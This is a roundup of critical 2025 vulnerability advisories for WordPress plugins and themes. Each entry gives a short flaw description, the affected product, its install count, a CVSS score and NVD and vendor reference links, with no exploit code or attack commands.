CVE-2025-12158 – The Simple User Capabilities plugin for WordPress allows unauthenticated attackers to elevate user roles to administrator due to missing capability checks.
Product: WordPress Simple User Capabilities plugin
Active Installations: This plugin has been closed as of October 30, 2025 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12158
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/dd75b8ec-1961-4a7a-92e6-1517e638974b?source=cve

CVE-2025-12493 – The ShopLentor plugin for WordPress is vulnerable to Local File Inclusion up to version 3.2.5, allowing unauthenticated attackers to execute arbitrary .php files on the server.
Product: ShopLentor WooCommerce Builder for Elementor & Gutenberg +21 Modules – All in One Solution (formerly WooLentor)
Active Installations: 100,000+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12493
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/12bb4bb9-e908-43ad-8fb1-59418580f5e1?source=cve

CVE-2025-12682 – The Easy Upload Files During Checkout plugin for WordPress allows unauthenticated attackers to upload arbitrary JavaScript files, leading to potential remote code execution.
Product: WordPress Easy Upload Files During Checkout plugin
Active Installations: 600+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12682
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/6a050764-0ba6-49a4-bd71-f79e3129fc4c?source=cve

CVE-2025-11749 – The AI Engine plugin for WordPress up to version 3.1.3 is vulnerable to Sensitive Information Exposure via the /mcp/v1/ REST API endpoint, allowing attackers to extract and misuse the bearer token for privilege escalation.
Product: WordPress AI Engine plugin
Active Installations: 100,000+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-11749
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/06eaf624-aedf-453d-8457-d03a572fac0d?source=cve

CVE-2025-12674 – The KiotViet Sync plugin for WordPress allows unauthenticated attackers to upload arbitrary files and potentially achieve remote code execution.
Product: KiotViet Sync plugin for WordPress
Active Installations: This plugin has been closed as of November 4, 2025 and is not available for download. This closure is permanent. Reason: Author Request.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12674
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/7fdd670f-2a71-4c1d-af46-f0fd05352f7e?source=cve

CVE-2025-32222 – Widget Logic plugin for Widgetlogic.org allows attackers to inject malicious code, impacting versions from n/a to <= 6.0.5.
Product: Widgetlogic.org Widget Logic
Active Installations: 100,000+
Update to version 6.0.6 or later.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-32222
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/widget-logic/vulnerability/wordpress-widget-logic-6-0-5-remote-code-execution-rce-vulnerability

CVE-2025-39463 – Select-Themes Dessau dessau PHP Local File Inclusion vulnerability allows for improper control of filename for include/require statement in PHP program.
Product: Select-Themes Dessau
Active Installations: Unknown. Update to version 1.9 or later.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-39463
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/dessau/vulnerability/wordpress-dessau-theme-1-9-local-file-inclusion-vulnerability

CVE-2025-39466 – Mikado-Themes Dør dor allows PHP Local File Inclusion due to an Improper Control of Filename for Include/Require Statement in PHP Program vulnerability.
Product: Mikado-Themes Dør
Active Installations: Unknown. Update to version 2.4.1 or later.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-39466
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/dor/vulnerability/wordpress-doer-2-4-local-file-inclusion-vulnerability

CVE-2025-39467 – Mikado-Themes Wanderland <= 1.7.1 is vulnerable to Path Traversal allowing PHP Local File Inclusion from n/a.
Product: Mikado-Themes Wanderland
Active Installations: Unknown. Update to version 1.7.2 or later.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-39467
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/wanderland/vulnerability/wordpress-wanderland-1-7-1-local-file-inclusion-vulnerability

CVE-2025-39468 – Modal Survey in pantherius is vulnerable to PHP Remote File Inclusion from n/a through <= 2.0.2.0.1.
Product: Pantherius Modal Survey
Active Installations: Unknown.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-39468
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/modal-survey/vulnerability/wordpress-modal-survey-plugin-2-0-2-0-1-local-file-inclusion-vulnerability

CVE-2025-47588 – Aco-woo-dynamic-pricing plugin allows code injection in versions from n/a through <= 4.5.9.
Product: Acowebs Dynamic Pricing With Discount Rules for WooCommerce
Active Installations: 6,000+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47588
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/aco-woo-dynamic-pricing/vulnerability/wordpress-dynamic-pricing-with-discount-rules-for-woocommerce-plugin-4-5-9-arbitrary-code-execution-vulnerability

CVE-2025-48086 – Ajax Search Lite plugin is vulnerable to deserialization of untrusted data, allowing object injection from versions n/a to 4.13.3.
Product: wpdreams Ajax Search Lite
Active Installations: 80,000+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-48086
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/ajax-search-lite/vulnerability/wordpress-ajax-search-lite-plugin-4-13-3-php-object-injection-vulnerability

CVE-2025-48089 – Rainbow-Themes Education WordPress Theme | HiStudy histudy is vulnerable to SQL Injection allowing attackers to execute malicious code.
Product: Rainbow-Themes Education WordPress Theme | HiStudy
Active Installations: Unknown. Update to version 3.1.0 or later.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-48089
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/histudy/vulnerability/wordpress-education-wordpress-theme-histudy-theme-3-1-0-sql-injection-vulnerability

CVE-2025-48290 – bslthemes Kinsley allows remote attackers to include and execute arbitrary files via the filename parameter in a PHP include/require statement, potentially leading to unauthorized access or code execution.
Product: bslthemes Kinsley
Active Installations: Unknown. Update to version 3.4.5 or later.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-48290
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/kinsley/vulnerability/wordpress-kinsley-theme-3-4-4-local-file-inclusion-vulnerability

CVE-2025-48330 – Real Time Validation for Gravity Forms <= 1.7.0 allows PHP Local File Inclusion via an improper control of filename for include/require statement vulnerability.
Product: Daman Jeet Real Time Validation for Gravity Forms
Active Installations: 2,000+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-48330
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/real-time-validation-for-gravity-forms/vulnerability/wordpress-real-time-validation-for-gravity-forms-1-7-0-local-file-inclusion-vulnerability

CVE-2025-49386 – Preserve Code Formatting is vulnerable to Object Injection via Deserialization of Untrusted Data in versions n/a through 4.0.1.
Product: Scott Reilly Preserve Code Formatting
Active Installations: 500+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-49386
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/preserve-code-formatting/vulnerability/wordpress-preserve-code-formatting-plugin-4-0-1-php-object-injection-vulnerability

CVE-2025-49393 – Fetch Designs Sign-up Sheets is vulnerable to Object Injection through deserialization of untrusted data, affecting versions from n/a through <= 2.3.2.
Product: Fetch Designs Sign-up Sheets
Active Installations: 1,000+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-49393
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/sign-up-sheets/vulnerability/wordpress-sign-up-sheets-plugin-2-3-2-php-object-injection-vulnerability

CVE-2025-53242 – Deserialization of Untrusted Data vulnerability in VictorThemes Seil seil allows Object Injection.This issue affects Seil: from n/a through <= 1.7.1.
Product: VictorThemes Seil
Active Installations: Unknown.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-53242
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/seil/vulnerability/wordpress-seil-theme-1-7-1-deserialization-of-untrusted-data-vulnerability

CVE-2025-53252 – Zegen allows PHP Local File Inclusion, presenting a vulnerability in versions from n/a through 1.1.9.
Product: zozothemes Zegen
Active Installations: Unknown.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-53252
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/zegen/vulnerability/wordpress-zegen-theme-1-1-9-local-file-inclusion-vulnerability

CVE-2025-53283 – Drop Uploader for CF7 – Drag&Drop File Uploader Addon allows for unrestricted upload of files with dangerous types, potentially enabling the upload of a web shell to a web server.
Product: borisolhor Drop Uploader for CF7 – Drag&Drop File Uploader Addon
Active Installations: Unknown.
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-53283
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/drop-uploader-for-contact-form-7-dragdrop-file-uploader-addon/vulnerability/wordpress-drop-uploader-for-cf7-drag-drop-file-uploader-addon-plugin-2-4-1-arbitrary-file-upload-vulnerability

CVE-2025-53586 – Deserialization of Untrusted Data vulnerability in NooTheme WeMusic noo-wemusic allows Object Injection.This issue affects WeMusic: from n/a through <= 1.9.1.
Product: NooTheme WeMusic
Active Installations: Unknown. Update to version 1.9.2 or later.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-53586
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/noo-wemusic/vulnerability/wordpress-wemusic-theme-1-9-1-php-object-injection-vulnerability

CVE-2025-58595 – All In One Login allows identity spoofing due to an authentication bypass vulnerability in the Saad Iqbal All In One Login change-wp-admin-login plugin, impacting versions from n/a through 2.0.8.
Product: Saad Iqbal All In One Login
Active Installations: 70,000+
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-58595
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/change-wp-admin-login/vulnerability/wordpress-all-in-one-login-plugin-2-0-8-bypass-vulnerability-vulnerability

CVE-2025-60195 – Incorrect Privilege Assignment vulnerability in Vito Peleg Atarim atarim-visual-collaboration allows Privilege Escalation.This issue affects Atarim: from n/a through <= 4.2.
Product: Vito Peleg Atarim
Active Installations: Unknown.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-60195
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/atarim-visual-collaboration/vulnerability/wordpress-atarim-plugin-4-2-privilege-escalation-vulnerability

CVE-2025-62016 – Unrestricted Upload of File with Dangerous Type vulnerability in hogash Kallyas kallyas.This issue affects Kallyas: from n/a through <= 4.22.0.
Product: hogash Kallyas
Active Installations: Unknown. Update to version 4.23.0 or later.
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62016
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/kallyas/vulnerability/wordpress-kallyas-theme-4-22-0-arbitrary-file-upload-vulnerability

CVE-2025-62047 – Case Addons is vulnerable to unrestricted upload of files with dangerous types in versions from n/a through < 1.3.0.
Product: Case-Themes Case Addons
Active Installations: Unknown. Update to version 1.3.0 or later.
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62047
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/case-addons/vulnerability/wordpress-case-addons-plugin-1-3-0-arbitrary-file-upload-vulnerability

CVE-2025-62064 – Elated-Themes Search & Go allows password recovery exploitation through an alternate path or channel, affecting versions from n/a through 2.7.
Product: Elated-Themes Search & Go
Active Installations: Unknown. Update to version 2.8 or later.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62064
NVD References: https://vdp.patchstack.com/database/Wordpress/Theme/search-and-go/vulnerability/wordpress-search-go-theme-2-7-broken-authentication-vulnerability

CVE-2025-62065 – Unrestricted Upload of File with Dangerous Type vulnerability in Rometheme RTMKit rometheme-for-elementor.This issue affects RTMKit: from n/a through <= 1.6.5.
Product: Rometheme RTMKit
Active Installations: 40,000+
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62065
NVD References: https://vdp.patchstack.com/database/Wordpress/Plugin/rometheme-for-elementor/vulnerability/wordpress-rtmkit-plugin-1-6-5-arbitrary-file-upload-vulnerability

CVE-2025-6325 & CVE-2025-6327 – King Addons for Elementor KingAddons.com allows Privilege Escalation due to Incorrect Privilege Assignment vulnerability, affecting versions from n/a through 51.1.36 (CVE-2025-6325) and also allows the unrestricted upload of dangerous files, potentially allowing a web shell to be uploaded to a web server (CVE-2025-6327).
Product: KingAddons.com King Addons for Elementor
Active Installations: 10,000+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-6325
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-6327
NVD References:
– https://vdp.patchstack.com/database/Wordpress/Plugin/king-addons/vulnerability/wordpress-king-addons-for-elementor-plugin-51-1-36-privilege-escalation-vulnerability
– https://vdp.patchstack.com/database/Wordpress/Plugin/king-addons/vulnerability/wordpress-king-addons-for-elementor-plugin-51-1-36-arbitrary-file-upload-vulnerability

CVE-2025-12352 – The Gravity Forms plugin for WordPress is vulnerable to arbitrary file uploads allowing unauthenticated attackers to potentially execute remote code.
Product: WordPress Gravity Forms
Active Installations: Unknown. Update to version 2.9.21, or a newer patched version
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12352
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/42525101-6196-40b9-90e7-c7f1886ef247?source=cve

CVE-2025-11170 – The cpi-wp-migration plugin for WordPress allows unauthenticated attackers to upload arbitrary files on the server, potentially leading to remote code execution.
Product: cpi-wp-migrationCPI plugin for WordPress
Active Installations: This plugin has been closed as of November 7, 2025 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-11170
NVD References:
– https://wordpress.org/plugins/cpi-wp-migration/
– https://www.wordfence.com/threat-intel/vulnerabilities/id/8a96d6d5-a5e3-4648-902b-f9d1f8e57e5c?source=cve

CVE-2025-12813 – The Holiday class post calendar plugin for WordPress is vulnerable to Remote Code Execution up to version 7.1 through the ‘contents’ parameter, allowing unauthenticated attackers to execute code on the server.
Product: WordPress Holiday class post calendar plugin
Active Installations: This plugin has been closed as of November 7, 2025 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12813
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/7f7968c4-589c-4949-9f69-4a0ba4db4ea9?source=cve

CVE-2025-12539 – The TNC Toolbox: Web Performance plugin for WordPress is vulnerable to Sensitive Information Exposure due to storing cPanel API credentials in unprotected files, allowing attackers to compromise the hosting environment.
Product: TNC Toolbox Web Performance plugin for WordPress
Active Installations: 800+
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12539
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/2eaa5a5c-c11f-40d0-be69-c3ec8029a819?source=cve